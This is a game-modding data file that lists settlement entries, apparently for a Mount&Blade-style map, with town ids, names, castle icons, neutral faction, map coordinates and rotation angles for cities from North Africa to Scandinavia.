("hadrumetum", "Hadrumetum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (113.72, -129.76), [], 255.0),
("tarabulus", "Tarabulus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (85.52, -94.52), [], 270.0),
("palermo", "Palermo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (84.0, -157.04), [], 35.0),
("annaba", "Annaba", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (145.2, -141.8), [], 10.0),
("lilybaeum", "Lilybaeum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (91.76, -153.8), [], 90.0),
("gaspar", "Gaspar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.24, -114.04), [], 80.0),
("sirte", "Sirte", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.72, -75.8), [], 180.0),
("constantine", "Constantine", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (157.44, -137.08), [], 240.0),
("laghouat", "Laghouat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (197.84, -106.4), [], 155.0),
("tebessa", "Tebessa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (140.8, -125.48), [], 275.0),
("agra", "Agra", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-618.36, -36.76), [], 175.0),
("karachi", "Karachi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-502.8, -7.2), [], 30.0),
("indore", "Indore", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-599.08, 15.96), [], 35.0),
("satna", "Satna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-653.12, -4.24), [], 115.0),
("multan", "Multan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-547.0, -65.68), [], 245.0),
("nagpur", "Nagpur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-634.0, 33.2), [], 120.0),
("allahabad", "Allahabad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-666.4, -13.94), [], 130.0),
("kota", "Kota", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-598.88, -10.2), [], 180.0),
("jaipur", "Jaipur", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-597.96, -28.52), [], 180.0),
("bikaner", "Bikaner", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-571.12, -41.48), [], 185.0),
("jaisalmer", "Jaisalmer", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-542.62, -26.5), [], 180.0),
("quetta", "Quetta", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-502.48, -65.72), [], 10.0),
("rome", "Rome", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (92.8, -206.4), [], 135.0),
("ravenna", "Ravenna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.8, -243.16), [], 135.0),
("messana", "Messana", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (62.4, -157.6), [], 280.0),
("brundisium", "Brundisium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (34.12, -189.24), [], 260.0),
("verona", "Verona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (109.56, -254.12), [], 280.0),
("liguria", "Liguria", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (139.2, -246.4), [], 65.0),
("cagliari", "Cagliari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (130.4, -174.8), [], 145.0),
("capua", "Capua", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (78.64, -199.48), [], 145.0),
("croton", "Croton", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (44.6, -171.04), [], 275.0),
("aquileia", "Aquileia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.56, -259.04), [], 90.0),
("arretium", "Arretium", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (101.32, -229.72), [], 225.0),
("bologna", "Bologna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (106.08, -240.2), [], 180.0),
("neapolis", "Neapolis", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (73.72, -193.56), []),
("ajaccio", "Ajaccio", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (132.0, -206.8), [], 160.0),
("salerno", "Salerno", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (67.6, -191.12), [], 55.0),
("pescara", "Pescara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (74.8, -213.44), [], 15.0),
("foggia", "Foggia", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.36, -201.56), [], 60.0),
("udine", "Venice", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (93.88, -255.26), [], 55.0),
("spalato", "Spalato", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.16, -191.96), [], 90.0),
("terni", "Terni", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (91.04, -215.0), [], 90.0),
("bari", "Bari", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (45.56, -195.48), [], 45.0),
("mediolanum", "Mediolanum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (129.12, -254.72), [], 90.0),
("etruscan", "Etruscan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (110.0, -223.24), [], 90.0),
("locri", "Locri", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (51.0, -161.68), [], 85.0),
("thurii", "Thurii", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (49.68, -177.24), [], 125.0),
("genoa", "Genoa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.44, -241.08), [], 270.0),
("ancona", "Ancona", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.04, -228.3), [], 175.0),
("modena", "Modena", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (110.6, -242.76), []),
("terracina", "Terracina", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (85.24, -199.36), [], 105.0),
("jerusalem", "Jerusalem", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.8, -82.92), [], 170.0),
("antioch", "Antioch", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-167.12, -133.12), [], 100.0),
("cyprus", "Cyprus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-136.8, -121.6), [], 260.0),
("acre", "Acre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-154.4, -93.2), [], 115.0),
("tripoli", "Tripoli", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-166.8, -115.6), [], 10.0),
("sidon", "Sidon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-157.28, -103.04), [], 275.0),
("tarsus", "Tarsus", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-157.8, -144.2), [], 240.0),
("saheth", "Saheth", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-171.08, -112.16), [], 240.0),
("tyre", "Tyre", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-160.28, -107.68), [], 180.0),
("aleppo", "Aleppo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-178.12, -134.48), [], 45.0),
("kiev", "Kiev", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-103.46, -321.88), [], 90.0),
("lutsk", "Lutsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-47.2, -331.2), [], 270.0),
("chernigov", "Chernigov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-112.24, -342.84), [], 280.0),
("mariupol", "Mariupol", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-180.28, -278.12), [], 180.0),
("mazyr", "Mazyr", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.0, -351.48), []),
("kirovohrad", "Kirovohrad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-122.6, -297.52), [], 15.0),
("belgorod", "Belgorod", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-170.36, -328.68), [], 80.0),
("armabir", "Armabir", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-219.56, -248.2), [], 80.0),
("poltava", "Poltava", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-148.0, -313.6), [], 55.0),
("zhytomyr", "Zhytomyr", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-83.32, -323.68), [], 10.0),
("babrujsk", "Babrujsk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-90.24, -369.24), [], 45.0),
("bryansk", "Bryansk", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-146.52, -371.12), [], 60.0),
("syutuka", "Syutuka", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-136.28, -348.92), [], 90.0),
("tambov", "Tambov", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-222.8, -361.8), [], 180.0),
("paris", "Paris", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (202.04, -303.52), [], 120.0),
("rouen", "Rouen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (217.2, -312.0), [], 45.0),
("toulon", "Toulon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (164.72, -224.0), [], 260.0),
("nancy", "Nancy", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (161.6, -300.4), [], 130.0),
("toulouse", "Toulouse", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (212.7, -230.38), [], 45.0),
("lyon", "Lyon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (176.4, -258.6), [], 270.0),
("reims", "Reims", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (185.44, -308.44), [], 45.0),
("le_mans", "Le mans", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (227.52, -290.64), [], 315.0),
("dijon", "Dijon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (173.76, -280.52), []),
("troyes", "Troyes", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (181.88, -292.96), [], 180.0),
("lille", "Lille", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (196.2, -329.56), [], 20.0),
("avignon", "Avignon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (176.64, -233.64), [], 60.0),
("orleans", "Orleans", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (209.34, -290.64), [], 260.0),
("digoin", "Digoin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (186.28, -268.44), [], 15.0),
("caen", "Caen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (233.28, -307.8), [], 80.0),
("valladolid", "Valladolid", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (194.0, -253.84), [], 165.0),
("bourges", "Bourges", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (199.2, -276.8), [], 145.0),
("laon", "Laon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (190.2, -313.48), [], 270.0),
("angers", "Angers", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (235.8, -284.24), [], 180.0),
("babylon", "Babylon", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-258.16, -102.78), [], 150.0),
("persepolise", "Persepolise", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-348.0, -62.0), [], 90.0),
("susa", "Susa", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-291.06, -83.44), [], 50.0),
("egbatana", "Egbatana", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-290.24, -117.3), [], 80.0),
("birjand", "Birjand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-416.8, -95.2), [], 280.0),
("mosul", "Mosul", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-244.56, -136.22), [], 260.0),
("herat", "Herat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-449.6, -112.8), [], 315.0),
("zahedan", "Zahedan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-434.8, -57.2), [], 225.0),
("abu_dhabi", "Abu Dhabi", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-364.24, 2.48), [], 90.0),
("dammam", "Dammam", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-315.88, -23.28), [], 120.0),
("kandahar", "Kandahar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-488.12, -81.92), [], 45.0),
("kashan", "Kashan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-332.52, -108.88), [], 275.0),
("turbat", "Turbat", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-459.16, -19.4), [], 315.0),
("al_ain", "Al Ain", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-379.6, 0.8), [], 180.0),
("isfahan", "Isfahan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-334.72, -92.92), [], 20.0),
("semnan", "Semnan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-353.68, -127.36), [], 90.0),
("kerman", "Kerman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-393.68, -66.2), [], 240.0),
("bandar_abbas", "Bandar Abbas", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-384.84, -32.44), [], 35.0),
("erzurum", "Erzurum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-221.24, -180.92), [], 180.0),
("batman", "Batman", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-219.6, -154.92), [], 90.0),
("tabriz", "Tabriz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-276.4, -157.16), [], 90.0),
("abadan", "Abadan", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-298.84, -63.44), []),
("farah", "Farah", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-448.92, -89.88), [], 20.0),
("qazvin", "Qazvin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-316.4, -135.2), [], 90.0),
("dubai", "Dubai", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-374.72, -10.72), [], 95.0),
("al_batin", "Al batin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-272.48, -45.56), [], 125.0),
("arak", "Arak", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-313.12, -109.84), [], 45.0),
("chabahar", "Chabahar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-433.8, -13.72), [], 45.0),
("loskile", "Loskile", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.4, -409.4), [], 80.0),
("oslo", "Oslo", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (111.5816, -488.68), [], 260.0),
("bergen", "Bergen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (171.8, -498.36), [], 260.0),
("viborg", "Viborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (126.48, -425.0), [], 125.0),
("husum", "Husum", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (131.6, -392.0), [], 125.0),
("stavanger", "Stavanger", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (167.2, -471.16), [], 75.0),
("faroe", "Faroe", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (306.08, -534.52), [], 110.0),
("trondheim", "Trondheim", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (114.64, -559.16), []),
("kristiansand", "Kristiansand", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (142.36, -455.32), [], 345.0),
("aalborg", "Aalborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (121.16, -435.48), [], 55.0),
("helsingborg", "Helsingborg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (90.16, -417.92), [], 15.0),
("odense", "Odense", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (115.8, -406.68), [], 90.0),
("haugesund", "Haugesund", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (171.4, -479.8), [], 160.0),
("skien", "Skien", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (124.6, -475.76), [], 180.0),
("hamar", "Hamar", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (108.48, -506.28), [], 60.0),
("torshavn", "Torshavn", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (304.36, -530.8), [], 145.0),
("mold", "Mold", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (151.08, -546.04), [], 215.0),
("lerwick", "Lerwick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (243.08, -492.56), [], 35.0),
("grimstad", "Grimstad", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.96, -458.4), [], 175.0),
("frankfurt", "Frankfurt", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (134.4, -321.88), [], 135.0),
("luebeck", "Luebeck", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (112.56, -381.28), [], 80.0),
("magdeburg", "Magdeburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (102.0, -352.8), [], 300.0),
("hamburg", "Hamburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (119.6, -376.0), [], 260.0),
("munich", "Munich", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (102.8, -292.4), [], 260.0),
("vienna", "Vienna", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.96, -295.48), [], 235.0),
("nuremberg", "Nuremberg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (108.4, -311.6), [], 55.0),
("cologne", "Cologne", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (153.6, -333.6), [], 85.0),
("dresden", "Dresden", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (77.88, -338.28), [], 155.0),
("rostock", "Rostock", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (95.68, -384.24), [], 80.0),
("karlsruhe", "Karlsruhe", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (137.88, -305.0), [], 270.0),
("bielefeld", "Bielefeld", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (136.48, -351.08), [], 125.0),
("essen", "Essen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (152.8, -342.72), [], 180.0),
("bremen", "Bremen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (133.32, -367.72), [], 40.0),
("chemnitz", "Chemnitz", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (87.2, -327.6), [], 20.0),
("kiel", "Kiel", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (118.84, -388.4), [], 10.0),
("dortmund", "Dortmund", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (148.08, -343.32), [], 55.0),
("prague", "Prague", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (71.72, -321.08), [], 45.0),
("stuttgart", "Stuttgart", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (64.6, -301.52), [], 45.0),
("berlin", "Berlin", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.64, -359.04), [], 85.0),
("brno", "Brno", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (48.4, -307.6), [], 45.0),
("groningen", "Groningen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (157.2, -365.6), [], 225.0),
("leipzig", "Leipzig", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (94.32, -340.24), [], 125.0),
("plzen", "Plzen", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (83.4, -315.72), []),
("neubrandenburg", "Neubrandenburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (84.6, -375.84), [], 145.0),
("brunswick", "Brunswick", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (114.4, -354.84), [], 15.0),
("antwerp", "Antwerp", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (181.22, -343.58), [], 85.0),
("amsterdam", "Amsterdam", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (175.6, -356.0), [], 55.0),
("geneva", "Geneva", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (162.2, -265.04), [], 160.0),
("luxembourg", "Luxembourg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (162.84, -316.0), [], 60.0),
("uppsala", "Uppsala", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (36.0, -487.2), [], 290.0),
("gothenburg", "Gothenburg", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (98.76, -451.12), [], 260.0),
("skara", "Skara", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (82.4, -454.0), [], 260.0),
("visby", "Visby", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (28.4, -443.6), [], 50.0),
("helsinki", "Helsinki", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (-42.84, -493.72), [], 95.0),
("norrkoping", "Norrkoping", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (53.28, -462.52), [], 180.0),
("falun", "Falun", icon_point_mark|pf_castle, no_menu, pt_none, fac_neutral, aggressiveness_0, ai_bhvr_hold, 0, (58.56, -501.96), [], 275.0),
